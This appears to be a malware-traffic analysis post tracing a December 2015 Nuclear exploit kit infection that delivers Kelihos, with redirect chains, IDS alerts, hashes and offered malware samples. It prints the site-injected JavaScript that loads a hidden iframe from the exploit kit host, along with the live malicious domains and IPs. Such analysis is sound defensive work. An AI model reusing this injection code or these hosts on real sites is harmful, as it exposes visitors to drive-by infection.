Notes
PCAP and Malware

PCAP here: 2015-12-21-Nuclear-EK-Traffic-Threatglass.pcap
Malware here: 2015-12-21-Malware-Exploits.zip

For password, please email me at jack@malwarefor.me.

Compromised Domain and Redirects

2015-12-21 04:23:31 - 185.53.91.89 - newimagepost.com - GET /
2015-12-21 04:23:40 - 45.63.13.175 - checkyourtraff.ml - GET /r/affiliate/
2015-12-21 04:23:41 - 104.131.220.187 - game.gameforgods.com - GET /ad/?id=6943631&keyword=mediahub&tsrc=mediahub

Deobsfucated javascript:
var ctdznf=document.createElement("div");ctdznf.innerHTML="<style>#xntfyf{position:absolute;z-index:1000;top:-1000px;left:-9999px;}</style><div id=\"xntfyf\"><iframe src=\"http://zzz1.zzzmaluw4.ws/threshers/consultant.php?flowerpot=5375&dates=looneyier\"></iframe></div>";document.body.appendChild(ctdznf);

Nuclear EK Traffic

2015-12-21 04:23:42 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /threshers/consultant.php?flowerpot=5375&dates=looneyier
2015-12-21 04:23:43 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /typifying/inseparability/thumbtack/flatness/abashing.php?construe=592213114379&arouse=39050
2015-12-21 04:23:45 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /continued/grieves/experimented.php?prows=279452299216
2015-12-21 04:23:46 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /presumed/mousetraps/endeavoring/leonine.php?zigzagging=586722145937

Payload XOR'd with ASCII string 'IluHpE'

Post-Infection Kelhios Traffic

2015-12-21 04:23:47 - 118.26.116.159 - 118.26.116.159 - GET /obsorbu.exe
2015-12-21 04:23:47 - 118.26.116.159 - 118.26.116.159 - GET /obsorbu.exe

IDS alerts using the Emerging Threats Pro Ruleset (INFO/POLICY disabled) on Suricata 2.0.8

2015-12-21 04:23:32 - 185.53.91.89:80 -> 192.168.33.10:1041 - ET WEB_CLIENT Possible % Encoded Iframe Tag
2015-12-21 04:23:32 - 185.53.91.89:80 -> 192.168.33.10:1041 - ET WEB_CLIENT Hex Obfuscation of Script Tag % Encoding
2015-12-21 04:23:42 - 192.168.33.10:1093 -> 46.101.82.41:80 - ETPRO CURRENT_EVENTS Nuclear EK Landing URI struct Dec 03 2015 M1
2015-12-21 04:23:43 - 46.101.82.41:80 -> 192.168.33.10:1093 - ETPRO CURRENT_EVENTS Nuclear EK Landing Oct 20 2015 M1
2015-12-21 04:23:43 - 192.168.33.10:1093 -> 46.101.82.41:80 - ETPRO CURRENT_EVENTS Nuclear EK Flash Exploit IE Dec 03 2015 M1
2015-12-21 04:23:48 - 192.168.33.10:1097 -> 190.11.145.98:80 - ET TROJAN Possible Kelihos.F EXE Download Common Structure
2015-12-21 04:23:48 - 192.168.33.10:1098 -> 190.11.145.98:80 - ET TROJAN Possible Kelihos.F EXE Download Common Structure
2015-12-21 04:23:53 - 46.101.82.41:80 -> 192.168.33.10:1093 - ETPRO CURRENT_EVENTS Nuclear EK Flash Exploit Dec 03 2015
2015-12-21 04:24:57 - 192.168.33.10:1109 -> 118.26.116.159:80 - ET TROJAN Win32/Kelihos.F Checkin
2015-12-21 04:25:43 - 190.11.145.98:80 -> 192.168.33.10:1097 - ET TROJAN Possible Kelihos Infection Executable Download With Malformed Header

Preliminary Malware Analysis

File name: 2015-12-21-Nuclear-EK-Flash-Exploit.swf
File size: 93.1 KB ( 95324 bytes )
MD5 hash: 6e7b708857c2c4723c95e09564eb973c
Detection ratio: 1/53
First submission: 2015-12-21 19:31:42 UTC
VirusTotal link: https://www.virustotal.com/en/file/1dd65e400d19a31a520259b03b8ac232b8c7f0e6699ffc022273290d5758d2be/analysis/1451256579/

File name: 2015-12-21-Nuclear-EK-Payload.exe
File size: 99.5 KB ( 101890 bytes )
MD5 hash: 8b43ff1a7211831927bda03ac3ca7527
Detection ratio: 39/54
First submission: 2015-12-23 08:19:37 UTC
VirusTotal link: https://www.virustotal.com/en/file/63e23206d243bc38516079372fae014ae98b74489f5862bed3d289d42ba81ba9/analysis/1451256643/

File name: obsorbu.exe
File size: 1.0 MB ( 1082231 bytes )
MD5 hash: f149ec1a43cbaf9c005f4897648378c0
Detection ratio: 35/55
First submission: 2015-12-21 19:23:22 UTC
VirusTotal link: https://www.virustotal.com/en/file/efc55670c4bdb510b5d0da47c787c54c67d13339d02442bfbd5f8f531e54dc6a/analysis/1451256598/

PCAP and Malware

PCAP here: 2015-12-21-Nuclear-EK-Traffic-Threatglass.pcap
Malware here: 2015-12-21-Malware-Exploits.zip

For password, please email me at jack@malwarefor.me.

If you have any feedback or questions please email me at jack@malwarefor.me.
Additionally, you can reach out on Twitter or follow for for updates